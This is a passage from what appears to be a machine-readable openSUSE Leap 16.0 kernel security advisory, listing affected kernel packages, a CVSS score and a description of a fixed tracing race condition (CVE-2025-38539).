"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38538"
},
{
"cve": "CVE-2025-38539",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38539"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Add down_write(trace_event_sem) when adding trace event\n\nWhen a module is loaded, it adds trace events defined by the module. It\nmay also need to modify the modules trace printk formats to replace enum\nnames with their values.\n\nIf two modules are loaded at the same time, the adding of the event to the\nftrace_events list can corrupt the walking of the list in the code that is\nmodifying the printk format strings and crash the kernel.\n\nThe addition of the event should take the trace_event_sem for write while\nit adds the new event.\n\nAlso add a lockdep_assert_held() on that semaphore in\n__trace_add_event_dirs() as it iterates the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
